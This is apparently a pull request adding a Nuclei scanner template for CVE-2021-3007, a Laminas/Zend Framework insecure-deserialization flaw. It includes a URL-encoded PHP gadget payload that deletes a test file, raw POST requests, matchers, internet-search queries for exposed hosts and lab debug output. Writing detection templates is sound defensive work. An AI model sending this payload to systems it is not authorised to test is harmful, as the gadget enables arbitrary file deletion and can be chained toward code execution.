### PR TITLE
AddCVE-2021-3007 - Laminas/Zend Framework Insecure Deserialization

### DIFF
--- a/http/cves/2021/CVE-2021-3007.yaml
+++ b/http/cves/2021/CVE-2021-3007.yaml
@@ -1,0 +1,84 @@
+id: CVE-2021-3007
+
+info:
+  name: Laminas Project laminas-http <2.14.2 / Zend Framework 3.0.0 - Insecure Deserialization RCE
+  author: harnguyen
+  severity: critical
+  description: |
+    Laminas Project laminas-http before 2.14.2 and Zend Framework 3.0.0 contain an insecure deserialization vulnerability in the __destruct method of Zend\Http\Response\Stream. When an attacker can control serialized data passed to unserialize(), this can lead to arbitrary file deletion or remote code execution through gadget chains.
+  impact: |
+    Successful exploitation allows remote attackers to execute arbitrary code on the affected system, potentially leading to complete system compromise.
+  remediation: |
+    Upgrade laminas-http to version 2.14.2 or later. If using Zend Framework, migrate to Laminas or apply available patches. Avoid unserializing user-controlled data.
+  reference:
+    - https://github.com/Ling-Yizhou/zendframework3-/blob/main/zend%20framework3%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%20rce.md
+    - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/
+    - https://vulncheck.com/xdb/697fc8c15292
+    - https://github.com/Vulnmachines/ZF3_CVE-2021-3007
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-3007
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.1
+    cve-id: CVE-2021-3007
+    cwe-id: CWE-502
+    epss-score: 0.02254
+    epss-percentile: 0.89587
+    cpe: cpe:2.3:a:laminas:laminas-http:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: laminas
+    product: laminas-http
+    shodan-query: http.component:"Zend Framework"
+    fofa-query: app="Zend-Framework"
+    google-query: inurl:"/vendor/zendframework" OR inurl:"/vendor/laminas"
+  tags: cve,cve2021,zend,laminas,deserialization,rce,kev,vkev,vuln
+
+# Zend\Http\Response\Stream gadget chain
+# The __destruct() method calls cleanup() which can trigger file deletion via streamName
+# This template detects successful deserialization of the vulnerable class
+
+http:
+  - raw:
+      # Payload: O:25:"Zend\Http\Response\Stream":3:{s:13:"\0*\0streamName";s:LEN:"URL";s:9:"\0*\0stream";N;s:10:"\0*\0cleanup";b:1;}
+      # Class name is 25 chars: Zend\Http\Response\Stream
+      # Using %00 for null bytes in URL-encoded form data
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        data=O%3A25%3A%22Zend%5CHttp%5CResponse%5CStream%22%3A3%3A%7Bs%3A13%3A%22%00%2A%00streamName%22%3Bs%3A20%3A%22%2Ftmp%2Fnuclei_test.txt%22%3Bs%3A9%3A%22%00%2A%00stream%22%3BN%3Bs%3A10%3A%22%00%2A%00cleanup%22%3Bb%3A1%3B%7D
+
+      - |
+        POST /index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        data=O%3A25%3A%22Zend%5CHttp%5CResponse%5CStream%22%3A3%3A%7Bs%3A13%3A%22%00%2A%00streamName%22%3Bs%3A20%3A%22%2Ftmp%2Fnuclei_test.txt%22%3Bs%3A9%3A%22%00%2A%00stream%22%3BN%3Bs%3A10%3A%22%00%2A%00cleanup%22%3Bb%3A1%3B%7D
+
+    stop-at-first-match: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Laminas\\Http\\Response\\Stream'
+          - 'Zend\\Http\\Response\\Stream'
+          - 'Laminas\Http\Response\Stream'
+          - 'Zend\Http\Response\Stream'
+        condition: or
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: class
+        part: body
+        group: 1
+        regex:
+          - '"type"\s*:\s*"([^"]+)"'
+


### PR DESCRIPTION
/attempt https://github.com/projectdiscovery/nuclei-templates/issues/14236
### PR Information

- Added CVE-2021-3007 - Laminas/Zend Framework Insecure Deserialization
- References:
  - https://github.com/projectdiscovery/nuclei-templates/issues/14236
  - https://nvd.nist.gov/vuln/detail/CVE-2021-3007
  - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

**Vulnerability Summary:**
Laminas Project laminas-http before 2.14.2 and Zend Framework 3.0.0 contain an insecure deserialization vulnerability in the `__destruct` method of `Zend\Http\Response\Stream`. Exploitation requires an application endpoint that calls `unserialize()` on attacker-controlled data.

**Gadget Chain:**
- Class: `Zend\Http\Response\Stream` (25 chars)
- Properties: `streamName` (protected), `stream` (protected), `cleanup` (protected)
- Impact: Arbitrary file deletion via `unlink()`, chainable with other gadgets for RCE

**Debug Output (True Positive):**

```
[INF] [CVE-2021-3007] Dumped HTTP request for http://localhost:8080

POST / HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded

data=O%3A25%3A%22Zend%5CHttp%5CResponse%5CStream%22%3A3%3A%7Bs%3A13%3A%22%00%2A%00streamName%22%3Bs%3A20%3A%22%2Ftmp%2Fnuclei_test.txt%22%3Bs%3A9%3A%22%00%2A%00stream%22%3BN%3Bs%3A10%3A%22%00%2A%00cleanup%22%3Bb%3A1%3B%7D

[DBG] [CVE-2021-3007] Dumped HTTP response http://localhost:8080

HTTP/1.1 200 OK
Content-Type: application/json
X-Powered-By: Zend Framework

{"status":"success","message":"Object unserialized and will be destroyed","type":"Laminas\\Http\\Response\\Stream"}

[CVE-2021-3007] [http] [critical] http://localhost:8080 ["Laminas\\\\Http\\\\Response\\\\Stream"]
```

**Vulnerable Environment:**
Docker environment included in `CVE-2021-3007-docker/` folder for validation:
- PHP 8.0 + Apache
- laminas-http 2.14.1 (vulnerable version)
- Simple PHP app with unserialize endpoint

```bash
cd http/cves/2021/CVE-2021-3007-docker
docker-compose up -d
nuclei -t ../CVE-2021-3007.yaml -u http://localhost:8080 -debug
```

**Shodan Query:** `http.component:"Zend Framework"`
**Fofa Query:** `app="Zend-Framework"`

### Notes

This CVE is a library-level vulnerability that requires:
1. Application using vulnerable laminas-http (<2.14.2) or Zend Framework 3.0.0
2. An endpoint that calls `unserialize()` on user-controlled input

The template demonstrates successful deserialization of the `Zend\Http\Response\Stream` gadget class, confirming the vulnerability exists. The gadget chain enables arbitrary file deletion and can be combined with other gadgets for RCE depending on available classes in the application.

This vulnerability was actively exploited in the wild by the FreakOut botnet (January 2021).

